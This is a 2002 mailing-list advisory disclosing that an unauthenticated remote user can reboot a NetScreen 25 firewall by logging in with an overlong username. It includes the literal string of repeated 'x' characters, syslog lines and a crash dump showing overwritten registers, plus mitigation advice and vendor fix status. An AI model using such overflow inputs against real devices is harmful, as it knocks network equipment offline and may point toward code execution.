Netscreen 25 unauthorised reboot issue

From: quentynat_private
Date: Mon May 27 2002 - 10:33:31 PDT

Next message: Pedro Quintanilha: "RE: TrendMicro Interscan VirusWall security problem"

Previous message: Ismael Briones: "Vulnerability in 3Com® OfficeConnect® Remote 812 ADSL Router"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

 Please note that this advisory was prepared, before speaking to
Netscreen's US operation. Nothing of this vulnerability has been
discussed here ( or on vun-dev) hence this email. Additionally it is not
shown on netscreen's security alerts page
(http://www.netscreen.com/support/alert.html) as of 25.05.2002.

After speaking to their 3rd line support in the US (eventually) I was
informed
that this had been fixed.

Indeed problem *has* been fixed as of  ScreenOS 3.0.1r2 ( however you
have to look in the release notes to discover this - ref cs00232). I
wonder how many people are still running affected firmware ?
 
 #Synopsis
 
 A remote user ( who is un authenticated ) can cause a netscreen 25 (
other versions untested) to reboot remotely. Software Version 3.0.1r1.1 
which was current as of about 1 month ago and has no alerts shown
against it on netscreen's security alert's page.
 
 #Method
 
 Log on to the netscreen with a user name of
 

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 and the device reboots
 
 this looks similar to
 http://www.net-security.org/vuln.php?id=577
 from a year ago
 
 remote syslog shows just that the device's interfaces came back up
 

 May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra
 system-notification-00513: The physical state of the interface trust
has
 changed to Up (2002-05-24 13:36:47)
 May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra
 system-notification-00513: The physical state of the interface untrust
 has changed to Up (2002-05-24 13:36:47)
 May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra
 system-notification-00513: The physical state of the interface DMZ has
 changed to Up (2002-05-24 13:36:48)

##### Start of console output

phaedra-> *******************************************************
                Exception Dump
*******************************************************
System up time: 3 hours 20 minutes 48 seconds
Exception(Instruction TLB Miss)
GPR:
R0: 78787878   R1: 03044e50  R2: 00470928  R3: 00000000
R4: 03044e08   R5: 000000ac  R6: 0074bde8  R7: 78787878
R8: 004c9d70   R9: 03a81d50  R10: 004fcb58 R11: 004d0000
R12: 40000024  R13: 004d1344 R14: 000d0904 R15: 80020020
R16: 43c00da1  R17: 300b6030 R18: 60101022 R19: 00000000
R20: 00750000  R21: 00470000 R22: 00000001 R23: 00755078
R24: 78787878  R25: 78787878 R26: 78787878 R27: 78787878
R28: 78787878  R29: 78787878 R30: 78787878 R31: 78787878
Special Register:
CR: 20000024   XER: 00000000  LR: 78787878    CTR: 00000000
MSR: 00021200  SRR0: 78787878 SRR1: 00029230  SRR2: 00300044
SRR3: 00000000 DBSR: 00000000 TCR: fc000000   TSR: 04000000
ESR: 00000000  DEAR: 00000000 PID: 00000000
*******************************************************
                Exception Dump
*******************************************************
System up time: 3 hours 20 minutes 48 seconds
Exception(Machine Check)
GPR:
R0: 78787878   R1: 03044d68  R2: 00470928  R3: 00000000
R4: 00000000   R5: 00000000  R6: 78787878  R7: 002fffd4
R8: 004c9d70   R9: 00000000  R10: 000002ec R11: 00000020
R12: 40000024  R13: 004d1344 R14: 000d0904 R15: 80020020
R16: 43c00da1  R17: 300b6030 R18: 60101022 R19: 00000000
R20: 00750000  R21: 00470000 R22: 00000001 R23: 00755078
R24: 78787878  R25: 78787878 R26: 78787878 R27: 00000001
R28: 03044d94  R29: 0000001f R30: 78787878 R31: 00000000
Special Register:
CR: 40000024   XER: 20000000  LR: 002fffd4    CTR: 00000000
MSR: 00000000  SRR0: 78787878 SRR1: 00029230  SRR2: 00300044
SRR3: 00021200 DBSR: 00000000 TCR: fc000000   TSR: 0c000000
ESR: 00000000  DEAR: 00000000 PID: 00000000
Trace Dump:
00300044 002fffd4 002ff8f4 002fee04 00000000
System Level:
Image In Interrupt Level
********************************************************
        Please use GDB to track the trace
********************************************************
ð

NetScreen PowerPC 405GP BootROM V1.01
(c)1997-2002 NetScreen Technologies Inc. All rights reserved

Check Platform...... NS-25

<snip normal netscreen start up>

###### End


 
#Preliminary Conclusions
 
restrict the IP's that can connect to the web interface.

and upgrade to the latest version of screen OS

#Vendor status

They had (as mentioned above) already fixed this issue , but had ( in my
personal opinion) not publicized it very well, hence this post.



Q

-- 
#####################
Quentyn Taylor
Sysadmin - Fotango
#####################
"I just went visual on this goofy looking Finn riding on a gnu, wielding
one pissed off penguin...
gah" 
   Bob The Sane

Next message: Pedro Quintanilha: "RE: TrendMicro Interscan VirusWall security problem"
Previous message: Ismael Briones: "Vulnerability in 3Com® OfficeConnect® Remote 812 ADSL Router"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon May 27 2002 - 10:50:39 PDT